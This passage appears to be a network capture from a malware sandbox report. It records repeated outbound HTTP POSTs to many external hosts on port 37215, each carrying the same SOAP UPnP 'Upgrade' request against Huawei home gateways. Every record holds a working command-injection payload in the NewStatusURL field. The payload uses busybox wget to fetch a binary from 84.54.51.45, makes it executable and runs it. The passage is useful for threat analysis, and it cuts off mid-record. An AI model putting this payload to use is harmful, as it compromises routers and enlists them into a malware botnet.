                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            718192.168.2.155507441.56.128.11137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.162656069 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            719192.168.2.153456441.239.19.337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.162657022 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            720192.168.2.155629441.102.149.5937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.162659883 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            721192.168.2.153544641.64.244.12137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.162673950 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            722192.168.2.155414441.62.5.9237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.162729979 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            723192.168.2.155375641.211.24.19937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.162730932 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            724192.168.2.153794441.36.38.24637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.162744045 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            725192.168.2.155252841.23.178.20937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.162744045 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            726192.168.2.154194041.102.180.10437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.162775993 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            727192.168.2.154284241.99.209.11937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.162775993 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 